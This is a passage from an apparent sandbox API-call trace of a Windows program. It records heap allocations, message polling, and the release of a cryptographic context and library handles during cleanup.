hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0186.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0186.234] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0186.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0186.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.236] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.236] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0186.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.236] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0186.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0186.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0186.236] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0186.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0186.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0186.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0186.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.238] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0186.238] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0186.238] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0186.238] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0186.238] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0186.238] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0186.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0186.239] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0186.239] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0186.239] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0186.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.240] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0186.240] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.240] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0186.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.240] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.240] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0186.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0186.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0186.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.241] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0186.241] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.241] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0186.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0186.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0186.242] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0186.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.242] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0186.242] FreeLibrary (hLibModule=0x756e0000) returned 1 [0186.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0186.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0186.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0186.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0186.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0186.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0186.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.243] CloseHandle (hObject=0x2d0) returned 1 [0186.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0186.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0186.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0186.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0186.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0186.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0186.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0186.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0186.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0186.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0186.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0186.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0186.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0186.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0186.247] CloseHandle (hObject=0x2a0) returned 1 [0186.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0186.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0186.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0186.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0186.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 